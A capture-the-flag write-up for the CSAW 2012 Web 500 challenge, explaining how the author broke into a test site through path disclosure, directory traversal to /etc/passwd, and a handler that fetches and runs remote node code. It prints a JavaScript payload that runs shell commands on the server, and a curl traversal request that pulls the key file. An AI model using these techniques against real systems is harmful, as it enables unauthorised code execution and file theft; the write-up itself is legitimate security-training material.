30
Sep
2012

CSAW 2012 – Web 500

Web 500 is a challenge to break into a website called Derpsoft’s Noderper diagnostics front-end.

Browsing the website for a few minutes with a HTTP intercept proxy (in this case Burp) revealed a number of vulnerabilities:
– When opening a non-existing file the full-path is disclosed: {“errno”:34,”code”:”ENOENT”,”path”:”/opt/noderp/htdocs//abc”}
– The site is vulnerable to directory traversal, for example GET /../../../../etc/passwd can be used to obtain a copy of the UNIX passwd file
– There is a JSON handler which can process requests, that will download a node program (either in javascript or compiled form) and execute it on the server.

That’s quite a lot to work with!

We created a javascript file which obtains a directory listing of the /opt/noderp (found in the error message) and store the output in a file call /tmp/abc:

exports.test = function () {
	var sys = require('sys')
	var exec = require('child_process').exec;
	function puts(error, stdout, stderr) { result = stdout }
	exec("/bin/ls -laR /opt/noderp > /tmp/abc", puts);
};

We host this file on a public website and run it by using the extenderp command. Then we collect the output using directory traversal. In the output we can see the key file is called key (*duh*).

Then we obtain key by using directory traversal again:

$ curl http://128.238.66.219:8080/../htdocs/key
d63d4a48390b6e61399b5e9ce4eae9af17e87c3

Comments are closed.